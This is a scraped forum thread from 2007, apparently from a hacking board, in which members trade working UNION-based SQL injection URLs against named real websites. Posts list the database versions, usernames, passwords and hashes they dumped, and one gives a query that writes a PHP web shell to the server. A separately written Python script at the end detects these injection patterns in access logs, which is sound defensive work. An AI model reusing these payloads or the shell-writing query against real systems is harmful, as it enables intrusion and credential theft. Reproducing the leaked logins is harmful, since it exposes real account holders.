SQL Injections

Discussion in 'Vulnerabilities' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. JIyka

    JIyka Member

    Joined:
    31 Oct 2007
    Messages:
    11
    Likes Received:
    9
    Reputations:
    5
    5.0.22:alinalexie@localhost:efitness

    http://www.topfitness.ro/viewdetails.php?t=2&id=-2+union+select+concat_ws(0x3a,version(),user()),2,3,4,5,6/*
     
    #4121 JIyka, 20 Dec 2007
    Last edited: 20 Dec 2007
  2. JIyka

    JIyka Member

    Joined:
    31 Oct 2007
    Messages:
    11
    Likes Received:
    9
    Reputations:
    5
    login:pass / billie:eakin brian:c@nd1@ linfra:linfra

    http://worldcondos.com/viewdetails.php?id=-1+union+select+1,2,concat_ws(0x3a,username,passwd,email),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+registered/*
     
    #4122 JIyka, 20 Dec 2007
    Last edited: 20 Dec 2007
  3. JIyka

    JIyka Member

    Joined:
    31 Oct 2007
    Messages:
    11
    Likes Received:
    9
    Reputations:
    5
    4.1.20:f7igqei2emj0@localhost

    http://www.e-dereham.info/viewdetails.php?section=public&id=-1+union+select+1,concat_ws(0x3a,version(),user()),3,4,5,6,7,8,9,10,11,12,13,14/*
     
  4. JIyka

    JIyka Member

    Joined:
    31 Oct 2007
    Messages:
    11
    Likes Received:
    9
    Reputations:
    5
    4.1.11:dcautos@localhost:dcautos

    http://www.dc-autos.com/viewdetails.php?id=-1+union+select+1,convert(concat_ws(0x3a,version(),user(),database())+using+latin1),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/*
     
    1 person likes this.
  5. n0ne

    n0ne Elder

    Joined:
    1 Jan 2007
    Messages:
    542
    Likes Received:
    284
    Reputations:
    -56
    phpbuddy.com

    phpbud22_phpbudd@localhost::phpbud22_phpbuddy::4.1.21-standard
     
    2 people like this.
  6. SWAT

    SWAT Elder

    Joined:
    14 Dec 2006
    Messages:
    198
    Likes Received:
    196
    Reputations:
    -7
    Code:
    http://www.tooltime.nl/pagina.php?id=-2+union+select+1,2,concat(id,0x3a,name)+from+admin/*
     
    2 people like this.
  7. Roba

    Roba Banned

    Joined:
    24 Oct 2007
    Messages:
    237
    Likes Received:
    299
    Reputations:
    165
    .еда
    classes.design.ucla.edu
    Code:
    http://classes.design.ucla.edu/Fall05/28/index_visor.php?id=3&ejercicio_id=15&persona_id=-1+union+select+1,2,3,4,concat_ws(0x3a,version(),user(),database()),6,7,8+--+
    5.0.22:[email protected]:F0528
    west.stanford.edu
    Code:
    http://west.stanford.edu/cgi-bin/pager.php?id=-1+union+select+concat_ws(0x3a,version(),user(),database()),2,3,4,5+--+
    5.0.45-3-log:[email protected]:g_west_west
     
    3 people like this.
  8. .Begemot.

    .Begemot. Elder

    Joined:
    27 Mar 2007
    Messages:
    148
    Likes Received:
    233
    Reputations:
    0
    kniga-market.kiev.ua

    HTML:
    http://www.kniga-market.kiev.ua/producers.php?category=1+union+select+0,1,concat(USER(),0x3a,VERSION(),0x3a,DATABASE()),3/*
    USER:u_knigamarke@localhost
    VERSION:4.1.22
    DATABASE:knigamarket
     
    2 people like this.
  9. ak-TEP

    ak-TEP Member

    Joined:
    17 Nov 2006
    Messages:
    13
    Likes Received:
    8
    Reputations:
    5
    ability.aol.com
    Code:
    http://ability.aol.com/ability/index.php?ID=45&catID=-6+union+select+1,convert(concat_ws(0x3a,version(),user(),database())+using+latin1)
    4.1.14-standard-log:[email protected]:aol_ability
     
    3 people like this.
  10. TEAM MUSLEMEN

    TEAM MUSLEMEN New Member

    Joined:
    22 Nov 2007
    Messages:
    3
    Likes Received:
    1
    Reputations:
    0
    HelO :D

    http://www.topfitness.ro

    USER
    SORS

    pass hash MYSQL
    255B543308FCC38F

    admin panel
    http://www.topfitness.ro/admin/

     
  11. TEAM MUSLEMEN

    TEAM MUSLEMEN New Member

    Joined:
    22 Nov 2007
    Messages:
    3
    Likes Received:
    1
    Reputations:
    0
    good :D

    from name (USER) ;)
     
  12. TEAM MUSLEMEN

    TEAM MUSLEMEN New Member

    Joined:
    22 Nov 2007
    Messages:
    3
    Likes Received:
    1
    Reputations:
    0

    Excellent work

    Continued


    use name
    Usama

    password hash
    dcddb75469b4b4875094e14561e573d8


    end password is
    Tigger You are excellent ;)
    :D :D :D :D :D
     
    1 person likes this.
  13. ~EviL~

    ~EviL~ Elder

    Joined:
    14 Aug 2007
    Messages:
    169
    Likes Received:
    77
    Reputations:
    4
    HTML:
    http://www.archaeolog.ru/index.php?id=2&id_nws=58+UNION+SELECT+1,2,3,4,concat(login,0x3a,pass,0x3a,email),6,7,8,9,10+FROM+userdata+LIMIT+1,1/*
    Columns there:
    id, pid, fio, stepen, dolshnost, bio, login, pass, email, telephon :p
     
    #4133 ~EviL~, 20 Dec 2007
    Last edited: 21 Dec 2007
  14. Roba

    Roba Banned

    Joined:
    24 Oct 2007
    Messages:
    237
    Likes Received:
    299
    Reputations:
    165
    Old news! And you're not even the first one today to post the inject on Trud =\\
     
    1 person likes this.
  15. netpingx

    netpingx New Member

    Joined:
    13 Dec 2007
    Messages:
    2
    Likes Received:
    3
    Reputations:
    0
    http://baltbay.com/index.php?bloks=2&sad=13+union+select+user,2,3,password,host,6,7,8,9,10,11,12,13+from+mysql.user/*

    http://backipars.lv/kipars/index.php?sadala=13+union+select+user,2,3,password,host,6,7,8,9,10,11,12,13+from+mysql.user/*

    http://jauniesivero.lv/index.php?page=news&section=-1/**/union/**/select/**/11111,22222/**from/**/user

    http://hostelturiba.lv/index.php?lang=13+union+select+user,2,3,password,host,6,7,8,9,10,11,12,13+from+mysql.user/*
     
    2 people like this.
  16. 5taY3r

    5taY3r Elder

    Joined:
    10 May 2007
    Messages:
    38
    Likes Received:
    35
    Reputations:
    0
    www.unbureauenplus.fr
    Code:
    http://unbureauenplus.fr/index.php?dir=news&id=-7+union+select+concat_ws(0x3a,version(),user(),database()),2,3/*
    5.0.44-log:[email protected]:unbureau_base1
    Code:
    http://unbureauenplus.fr/index.php?dir=news&id=-7+union+select+concat_ws(0x3a,pseudo,passe),2,3+from+papa_admin/*
    login:pass
    omi:1905
     
    5 people like this.
  17. .Begemot.

    .Begemot. Elder

    Joined:
    27 Mar 2007
    Messages:
    148
    Likes Received:
    233
    Reputations:
    0
    login:Usama
    password hash:dcddb75469b4b4875094e14561e573d8
    password:00000

    You can upload a shell through the injection and find out where the admin panel is.
    ----------------------------------------------------------

    ankor.ru

    HTML:
    http://www.ankor.ru/cityDescr.php3?uid=60&cid=17+union+select+0,1,concat(USER(),0x3a,VERSION(),0x3a,DATABASE())/*
    USER:[email protected]
    VERSION:4.0.27-log
    DATABASE:ankor
     
    #4137 .Begemot., 21 Dec 2007
    Last edited: 21 Dec 2007
    2 people like this.
  18. ElteRUS

    ElteRUS Elder

    Joined:
    11 Oct 2007
    Messages:
    367
    Likes Received:
    460
    Reputations:
    93
    http://www.trizland.ru/task.php?id=-11+union+select+1,2,3,4,concat_ws(0x2F,cast(version()+as+binary),cast(database()+as+binary),cast(user()+as+binary)),6,7,8,9/*

    4.1.18/bin17www/[email protected]

    -----------------------------------------------------------------------------

    all-news.ru


    http://www.all-news.ru/?nID=-1+union+select+1,concat_ws(0x2F,version(),database(),user()),3,4,5,6,7/*

    5.0.45-log/u15215_2/[email protected]


    http://www.all-news.ru/?nID=-1+union+select+1,concat_ws(0x2F,username,password,contact_email,contact_icq),3,4,5,6,7+from+u15215.zp_partners/*

    login/password/email/UIN
    runet/261072/[email protected]/


    http://www.all-news.ru/?nID=-1+union+select+1,concat_ws(0x2F,login,password,email,authkey),3,4,5,6,7+from+u15215.users/*

    login/password/email/auth key
    BaDGiRL/1791179/[email protected]/
     
    5 people like this.
  19. .Begemot.

    .Begemot. Elder

    Joined:
    27 Mar 2007
    Messages:
    148
    Likes Received:
    233
    Reputations:
    0
    HTML:
    http://www.site.ru/index.php?page=-1+union+select+1,2,,'<?php system($_GET[cmd]); ?>'+,4,5from+user+into+outfile+'/home/site/html/shell.php'/*
    Such a query will create a shell in the directory "/home/site/html/"

    ----------------------------------------

    cavs.msstate.edu

    HTML:
    http://www.cavs.msstate.edu/projects.php?id=34&rgid=5+union+select+0,1,2,Concat(USER(),0x3a,VERSION(),0x3a,DATABASE()),4/*
    USER:[email protected]
    VERSION:5.0.24a-standard
    DATABASE:webdata

    Tables -
    HTML:
    http://www.cavs.msstate.edu/projects.php?id=34&rgid=5+union+select+0,1,2,Concat(USER(),0x3a,VERSION(),0x3a,DATABASE(),0x3a,Table_name),4+from+information_schema.tables/*
    Columns -
    HTML:
    http://www.cavs.msstate.edu/projects.php?id=34&rgid=5+union+select+0,1,2,Concat(USER(),0x3a,VERSION(),0x3a,DATABASE(),0x3a,Column_name),4+from+information_schema.columns/*
     
    3 people like this.
  20. sasTO

    sasTO Banned

    Joined:
    2 Aug 2007
    Messages:
    205
    Likes Received:
    230
    Reputations:
    14
    Code:

    http://www.odin-torg.com/catalog_item.php?id=-13+union+select+1,concat(table_schema,0x3a,table_name,0x3a,column_name),3,4,5,6,7,8,9,10,11,12,13,14+from+information_schema.columns+where+column_name+like+0x257061737325+limit+0,1/*&cat=

    MySQL 5, there are 3 DBs with admin passwords; the site itself is junk, but something else is interesting, namely the CMS ;)

    P.S. Not one of the passwords works for the admin panel; whoever finds an account with access gets plus points from me :)
     
    1 person likes this.
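Every request in this thread has the same handful of shapes: a numeric parameter turned negative, `union select`, `concat`/`concat_ws` with a `0x3a` separator, probes of `version()`/`user()`/`database()`, reads from `information_schema` or `mysql.user`, `into outfile`, and a `/*` or `--` tail; one post even swaps spaces for `/**/`. A defender watching access logs can key on those shapes rather than on any one URL. The script below is an added detection example, not code from the thread or from any of the sites listed: it parses common-log-format lines, URL-decodes and de-comments each query parameter, and raises an alert when a parameter carries a `UNION ... SELECT` or two or more of the weaker signatures. The sample log lines, addresses and host paths are constructed placeholders, and the signature names and the two-signature threshold are my own choices.

```python
"""Flag UNION-based SQL injection probes in web-server access logs.

Added example for this thread; not code from the forum or from any site
named in it. Assumes Apache/nginx common-log-format request lines and the
payload shapes shown in the thread.
"""
import re
from urllib.parse import parse_qsl, unquote_plus

# Common log format: client ident user [timestamp] "METHOD target HTTP/x" status ...
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Signature names are my own; insertion order fixes the order inside an alert.
SIGNATURES = {
    "union_select": re.compile(r"\bunion\b.*\bselect\b", re.I),
    "concat_fingerprint": re.compile(r"\bconcat(?:_ws)?\s*\(", re.I),
    "hex_literal": re.compile(r"\b0x[0-9a-f]{2,}\b", re.I),
    "version_probe": re.compile(r"\b(?:version|user|database)\s*\(\s*\)", re.I),
    "info_schema": re.compile(r"\binformation_schema\.", re.I),
    "mysql_user": re.compile(r"\bmysql\.user\b", re.I),
    "into_outfile": re.compile(r"\binto\s+outfile\b", re.I),
    "comment_terminator": re.compile(r"(?:/\*|--)$"),
}


def normalize(value: str) -> str:
    """Undo the cheap evasions seen in the thread before matching.

    parse_qsl already decoded the value once; decoding again catches a
    percent-encoded '+' or a double-encoded payload. A closed /**/ is MySQL
    comment syntax used in place of a space (union/**/select), so closed
    comments become spaces; an unclosed trailing /* is left for the
    comment_terminator signature.
    """
    s = unquote_plus(value)
    s = re.sub(r"/\*.*?\*/", " ", s)
    return re.sub(r"\s+", " ", s).strip()


def analyze_target(target: str) -> dict:
    """Return {param: [signature names]} for parameters that look injected.

    A parameter is reported when it carries UNION ... SELECT or at least two
    weaker signatures, so a search for 'union station' is not an alert.
    """
    query = target.partition("?")[2]
    findings = {}
    for name, raw in parse_qsl(query, keep_blank_values=True):
        value = normalize(raw)
        hits = [sig for sig, rx in SIGNATURES.items() if rx.search(value)]
        if "union_select" in hits or len(hits) >= 2:
            findings[name] = hits
    return findings


def scan_log(lines) -> list:
    """Parse each log line and emit one alert per suspicious parameter."""
    alerts = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line we understand; skip it
        target = m.group("target")
        for param, hits in analyze_target(target).items():
            alerts.append({
                "client": m.group("client"),
                "path": target.partition("?")[0],
                "param": param,
                "signatures": hits,
            })
    return alerts


# Constructed sample lines (documentation addresses, placeholder paths,
# no real traffic); the payload shapes mirror the thread's posts.
SAMPLE_LOG = [
    '203.0.113.5 - - [20/Dec/2007:12:00:01 +0300] "GET /viewdetails.php?t=2&id=-2+union+select+concat_ws(0x3a,version(),user()),2,3,4,5,6/* HTTP/1.1" 200 5120',
    '198.51.100.7 - - [20/Dec/2007:12:00:02 +0300] "GET /viewdetails.php?t=2&id=17 HTTP/1.1" 200 4870',
    '192.0.2.9 - - [20/Dec/2007:12:00:03 +0300] "GET /index.php?page=news&section=-1/**/union/**/select/**/1,2/**/from/**/mysql.user/* HTTP/1.1" 200 3310',
    '198.51.100.7 - - [20/Dec/2007:12:00:04 +0300] "GET /search.php?q=union+station+timetable HTTP/1.1" 200 2210',
    '203.0.113.5 - - [21/Dec/2007:09:15:00 +0300] "GET /catalog_item.php?id=-13+union+select+1,concat(table_schema,0x3a,table_name,0x3a,column_name),3+from+information_schema.columns+where+column_name+like+0x257061737325+--+&cat= HTTP/1.1" 200 6001',
    'garbage line that is not a request',
]

if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(alert)
```

Run against the constructed log it reports three alerts (the two `viewdetails.php`/`catalog_item.php` probes and the `/**/`-obfuscated `mysql.user` read) and stays quiet on the plain `id=17` request and the "union station" search. The two-signature threshold is the knob to tune: raising it cuts noise from legitimate parameters that happen to contain hex or parentheses, lowering it catches probes that omit `UNION`, and both directions are best checked against a week of your own logs before the rule goes into an alerting pipeline.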